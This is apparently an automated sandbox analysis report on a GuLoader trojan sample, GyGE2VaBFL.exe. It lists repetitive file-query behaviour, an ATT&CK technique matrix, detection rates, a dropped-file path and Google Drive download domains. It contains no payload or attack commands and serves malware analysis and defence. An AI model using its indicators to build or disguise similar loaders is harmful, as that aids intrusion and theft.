      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\GyGE2VaBFL.exeCode function: 0_2_00403325 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403325

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Windows Management Instrumentation      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		11
      Masquerading      		OS Credential Dumping121
      Security Software Discovery      		Remote Services1
      Clipboard Data      		1
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault Accounts1
      Command and Scripting Interpreter      		Boot or Logon Initialization Scripts311
      Process Injection      		41
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Process Discovery      		Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain Accounts2
      PowerShell      		Logon Script (Windows)1
      DLL Side-Loading      		1
      Access Token Manipulation      		Security Account Manager41
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
      Process Injection      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput Capture14
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA Secrets3
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Software Packing      		Cached Domain Credentials24
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      GyGE2VaBFL.exe64%VirustotalBrowse
      GyGE2VaBFL.exe47%ReversingLabsWin32.Trojan.GuLoader

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\GyGE2VaBFL.exe64%VirustotalBrowse
      C:\Users\user\AppData\Local\afsindigstes\physitheism\altingsmedlemmet\Cideren231\GyGE2VaBFL.exe47%ReversingLabsWin32.Trojan.GuLoader

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      drive.google.com
      		216.58.206.78
      		truefalse
        		high
        drive.usercontent.google.com
        		142.250.185.193
        		truefalse
          		high

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1669114987.0000000005E9C000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://drive.usercontent.google.com/kmsiexec.exe, 0000000A.00000003.1973369262.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349387502.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2076406086.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034328553.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://drive.google.com/smsiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Licensepowershell.exe, 00000001.00000002.1669114987.0000000005E9C000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumeratesvchost.exe, 00000003.00000002.2415877697.0000017F82EAF000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://contoso.com/Iconpowershell.exe, 00000001.00000002.1669114987.0000000005E9C000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://crl.ver)svchost.exe, 00000003.00000002.2416637984.0000017F88200000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://drive.usercontent.google.com/msiexec.exe, 0000000A.00000003.1973369262.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1942442210.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034300080.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2230355519.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2304198126.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2136395251.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1788007854.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2167527111.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000002.2414604219.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1818594292.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1848304830.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1909807452.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1879994330.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.1973398417.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2349387502.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2076406086.0000000000B28000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2383919487.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2200809082.0000000000B27000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2261119586.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2034328553.0000000000B25000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2003808510.0000000000B28000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://g.live.com/odclientsettings/ProdV2.C:edb.log.3.drfalse
                                    		high
                                    http://nsis.sf.net/NSIS_ErrorErrorGyGE2VaBFL.exe, GyGE2VaBFL.exe.1.drfalse
                                      		high
                                      https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1666170853.0000000004F85000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://g.live.com/odclientsettings/Prod.C:edb.log.3.drfalse
                                          		high
